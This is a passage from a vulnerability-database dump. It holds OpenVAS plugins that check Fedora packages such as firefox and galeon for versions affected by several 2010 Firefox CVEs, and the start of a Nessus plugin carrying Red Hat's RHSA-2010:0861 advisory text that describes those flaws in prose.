\"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for firefox FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.5.15~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:11:26", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050158.html"], "pluginID": "862504", "description": "Check for the Version of gnome-web-photo", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "Fedora Update for gnome-web-photo FEDORA-2010-16885", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862504", "id": "OPENVAS:862504", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-web-photo FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnome-web-photo on Fedora 12\";\ntag_insight = \"gnome-web-photo contains a thumbnailer that will be used by GNOME applications,\n including the file manager, to generate screenshots of web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050158.html\");\n script_id(862504);\n script_version(\"$Revision: 8082 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-12 07:31:24 +0100 (Tue, 12 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for gnome-web-photo FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnome-web-photo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-web-photo\", rpm:\"gnome-web-photo~0.9~11.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:25", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "2010-16897"], "pluginID": "862660", "description": "Check for the Version of galeon", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "title": "Fedora Update for galeon FEDORA-2010-16897", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862660", "id": "OPENVAS:862660", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for galeon FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"galeon on Fedora 14\";\ntag_insight = \"Galeon is a web browser built around Gecko (Mozilla's rendering\n engine) and Necko (Mozilla's networking engine). It's a GNOME web\n browser, designed to take advantage of as many GNOME technologies as\n makes sense. Galeon was written to do just one thing - browse the web.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html\");\n script_id(862660);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for galeon FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of galeon\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"galeon\", rpm:\"galeon~2.0.7~35.fc14.1\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:51", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050153.html"], "pluginID": "862499", "description": "Check for the Version of firefox", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for firefox FEDORA-2010-16885", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862499", "id": "OPENVAS:862499", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for firefox FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"firefox on Fedora 12\";\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\n compliance, performance and portability.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050153.html\");\n script_id(862499);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for firefox FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.5.15~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:32:41", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050159.html"], "pluginID": "862531", "description": "Check for the Version of mozvoikko", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for mozvoikko FEDORA-2010-16885", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862531", "id": "OPENVAS:862531", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mozvoikko FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mozvoikko on Fedora 12\";\ntag_insight = \"This is mozvoikko, an extension for Mozilla programs for using the Finnish\n spell-checker Voikko.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050159.html\");\n script_id(862531);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for mozvoikko FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mozvoikko\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"mozvoikko\", rpm:\"mozvoikko~1.0~14.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:59", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050074.html", "2010-16897"], "pluginID": "862605", "description": "Check for the Version of perl-Gtk2-MozEmbed", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16897", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862605", "id": "OPENVAS:862605", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"perl-Gtk2-MozEmbed on Fedora 14\";\ntag_insight = \"This module allows you to use the Mozilla embedding widget from Perl.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050074.html\");\n script_id(862605);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl-Gtk2-MozEmbed\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-Gtk2-MozEmbed\", rpm:\"perl-Gtk2-MozEmbed~0.08~6.fc14.21\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:34:25", "references": ["http://www.mozilla.com/en-US/firefox/3.6.12/releasenotes/", "http://www.mozilla.com/en-US/firefox/3.6.11/releasenotes/", "https://www.redhat.com/security/data/cve/CVE-2010-3178.html", "https://www.redhat.com/security/data/cve/CVE-2010-3175.html", "https://www.redhat.com/security/data/cve/CVE-2010-3183.html", "https://www.redhat.com/security/data/cve/CVE-2010-3182.html", "http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#", "https://www.redhat.com/security/data/cve/CVE-2010-3176.html", "https://www.redhat.com/security/data/cve/CVE-2010-3765.html", "http://rhn.redhat.com/errata/RHSA-2010-0861.html", "https://www.redhat.com/security/data/cve/CVE-2010-3180.html", "https://www.redhat.com/security/data/cve/CVE-2010-3177.html", "https://www.redhat.com/security/data/cve/CVE-2010-3179.html"], "pluginID": "50633", "description": "Updated firefox packages that fix several security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL Runtime environment for Mozilla Firefox.\n\nA race condition flaw was found in the way Firefox handled Document Object Model (DOM) element properties. Malicious HTML content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text into HTML. A malformed file name on a Gopher server could, when accessed by a victim running Firefox, allow arbitrary JavaScript to be executed in the context of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could create a malicious web page that, when viewed by a victim, could steal private data from a different website the victim had loaded with Firefox. (CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH variable was appending a '.' character, which could allow a local attacker to execute arbitrary code with the privileges of a different user running Firefox, if that user ran Firefox from within an attacker-controlled directory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Firefox 3.6.11 and 3.6.12. You can find links to the Mozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain Firefox version 3.6.12, which corrects these issues. After installing the update, Firefox must be restarted for the changes to take effect.", "edition": 8, "reporter": "Tenable", "published": "2010-11-18T00:00:00", "title": "RHEL 6 : firefox (RHSA-2010:0861)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-07-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:xulrunner-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xulrunner", "p-cpe:/a:redhat:enterprise_linux:firefox", "p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xulrunner-devel", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2010-0861.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50633", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0861. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50633);\n script_version (\"1.23\");\n script_cvs_date(\"Date: 2018/07/25 18:58:05\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253, 44425);\n script_xref(name:\"RHSA\", value:\"2010:0861\");\n\n script_name(english:\"RHEL 6 : firefox (RHSA-2010:0861)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated firefox packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nA race condition flaw was found in the way Firefox handled Document\nObject Model (DOM) element properties. Malicious HTML content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179,\nCVE-2010-3183, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted\ntext into HTML. A malformed file name on a Gopher server could, when\naccessed by a victim running Firefox, allow arbitrary JavaScript to be\nexecuted in the context of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker\ncould create a malicious web page that, when viewed by a victim, could\nsteal private data from a different website the victim had loaded with\nFirefox. (CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The\nLD_LIBRARY_PATH variable was appending a '.' character, which could\nallow a local attacker to execute arbitrary code with the privileges\nof a different user running Firefox, if that user ran Firefox from\nwithin an attacker-controlled directory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.11 and 3.6.12. You can find links\nto the Mozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 3.6.12, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3177.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.com/en-US/firefox/3.6.11/releasenotes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.com/en-US/firefox/3.6.12/releasenotes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#\"\n );\n script_set_attribute(\n 